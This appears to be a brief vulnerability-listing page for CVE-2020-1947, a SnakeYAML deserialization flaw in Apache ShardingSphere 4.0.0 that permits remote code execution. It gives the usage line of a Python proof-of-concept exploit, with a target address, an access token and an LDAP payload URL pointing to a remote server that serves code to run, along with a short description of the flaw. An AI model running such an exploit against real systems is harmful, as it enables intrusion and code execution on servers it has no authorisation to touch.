CVE-2020-1947 Python POC
CVE-2020-1947 usage: CVE-2020-1947py [-h] -i IP -p PORT -T ACCESS_TOKEN -poc POC python CVE-2020-1947py -i 192168128135 -p 8088 -T eyJ1c2VybmFtZSI6ImFk******* -poc ldap://127001:1389/CommandObject
In Apache ShardingSphere(incubator) 4.0.0-RC3 and 4.0.0, the ShardingSphere's web console uses the SnakeYAML library for parsing YAML inputs to load datasource configuration. SnakeYAML allows to unmarshal data to a Java type By using the YAML tag. Unmarshalling untrusted data can lead to security flaws of RCE.
Vulnerable Product | Search on Vulmon | Subscribe to Product |
---|---|---|
apache shardingsphere 4.0.0 |